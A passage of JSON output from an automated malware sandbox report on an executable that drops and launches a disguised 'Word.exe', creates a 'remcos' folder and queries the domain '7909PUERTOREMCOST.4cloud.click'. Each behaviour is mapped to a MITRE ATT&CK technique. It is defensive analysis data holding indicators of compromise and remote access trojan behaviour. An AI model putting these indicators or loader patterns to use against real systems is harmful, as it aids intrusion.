\"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 757e0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"SETUPAPI.DLL\" at base 755c0000\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bd0000\n \"Word.exe\" loaded module \"KERNEL32.DLL\" at base 757e0000\n \"Word.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 77010000\n \"Word.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 746f0000\n \"Word.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74250000\n \"Word.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 746e0000\n \"Word.exe\" loaded module \"DNSAPI.DLL\" at base 745b0000\n \"Word.exe\" loaded module \"IPHLPAPI.DLL\" at base 73090000\n \"Word.exe\" loaded module \"RPCRT4.DLL\" at base 76a10000\n \"Word.exe\" loaded module \"RASADHLP.DLL\" at base 71390000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Psapi (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter shcore (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004116)\n \"Word.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005548)\n \"Word.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00000644)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" failed to load missing module \"shcore\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetCursorInfo (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetLastInputInfo (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetProcessImageFileNameW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetFinalPathNameByHandleW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RmStartSession (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004116)\n \"Word.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005548)\n \"Word.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005548)\n \"Word.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005548)\n \"Word.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005548)\n \"Word.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000644)\n \"Word.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00000644)\n \"Word.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00000644)\n \"Word.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00000644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ec16b@ADVAPI32.dll\"\n \"0e000f00703fc16b@ADVAPI32.dll\"\n \"0e000f00cc3fc16b@ADVAPI32.dll\"\n \"11001200b447c16b@ADVAPI32.dll\"\n \"110012004848c16b@ADVAPI32.dll\"\n \"120013008c48c16b@ADVAPI32.dll\"\n \"12001300e448c16b@ADVAPI32.dll\"\n \"14001500dc6fc16b@ADVAPI32.dll\"\n \"14001500f46fc16b@ADVAPI32.dll\"\n \"140015000c70c16b@ADVAPI32.dll\"\n \"170018002470c16b@ADVAPI32.dll\"\n \"0d000e003c70c16b@ADVAPI32.dll\"\n \"110012004c70c16b@ADVAPI32.dll\"\n \"110012006070c16b@ADVAPI32.dll\"\n \"0d000e00f066c16b@WININET.dll\"\n \"0d000e006067c16b@WININET.dll\"\n \"100011009867c16b@WININET.dll\"\n \"100011003c68c16b@WININET.dll\"\n \"10001100a470c16b@WININET.dll\"\n \"10001100b870c16b@WININET.dll\"\n \"14001500cc70c16b@WININET.dll\"\n \"14001500e470c16b@WININET.dll\"\n \"12001300fc70c16b@WININET.dll\"\n \"120013001071c16b@WININET.dll\"\n \"100011007c68c16b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76A10000\n \"Word.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76A10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\Program (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004116)\n \"Word.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\remcos (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"CreateProcessW\" with parameter \"\"%ALLUSERSPROFILE%\\Program\\Word.exe\"\" - (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"Word.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"Word.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"Word.exe\" (UID: 00000000-00005548) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"Word.exe\" (UID: 00000000-00005548) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"Word.exe\" (UID: 00000000-00000644) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"Word.exe\" (UID: 00000000-00000644) was launched with modified environment variables: \"PSModulePath, PATHEXT, NUMBER_OF_PROCESSORS\"\n Process \"Word.exe\" (UID: 00000000-00000644) was launched with missing environment variables: \"USERDNSDOMAIN\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"Word.exe\" (UID: 00000000-00005548)\n Spawned process \"Word.exe\" (UID: 00000000-00000644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"7909PUERTOREMCOST.4cloud.click\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"Word.exe\" (UID: 00000000-00005548)\n Spawned process \"Word.exe\" (UID: 00000000-00000644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Word.exe.bin\" was detected as 